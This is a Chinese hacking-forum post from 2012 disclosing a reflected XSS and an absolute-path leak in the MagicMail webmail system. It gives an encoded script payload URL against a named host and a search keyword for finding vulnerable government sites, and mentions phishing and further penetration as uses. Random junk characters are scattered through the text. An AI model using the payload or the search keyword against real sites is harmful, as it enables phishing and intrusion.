找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1875|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
' z% J3 U; t) \# g" i
" A4 T" F0 c, _: b& S8 @ % X$ @! q# L, T7 h* a
包含  一个反射性XSS  以及  绝对路径泄漏( p! s6 {' J' W% w5 y
看了看 貌似全部是linux的。' J$ t( q# ?! \+ F" |1 c
$ U( ^, \! j0 \1 D9 a3 K* K
关键字:迈捷邮件系统 by MagicMail
* Z8 {! u" l, t3 d3 b  g/ }9 n$ S# Q' M* J& C
可以看到很多政府网站都用这个邮件系统7 w( u$ o) z3 w4 R+ p( D
  ]2 X4 J0 C% E# X: M: ^# o
绝对路径 http://madman.in/index.php?login_type=declare&language=& V/ ^9 P/ O- |

& S8 K8 Y7 G+ L1 g0 e0 C1 D2 j  @# p0 `
7 i: x# U0 X! q- u# q
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E4 _( v, N) }' ?- e/ K7 a
# L8 [! L( `2 s" V: A
6 n5 V% W  L7 R$ o' ?9 L. U

. @4 K' s! g5 h/ Q6 @/ @  D8 F9 J# v虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
8 Y" j1 A, I% O$ x
, D/ _( a+ ?# E修复方案:看官方补丁吧。
' }3 S. B/ {5 ?/ f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表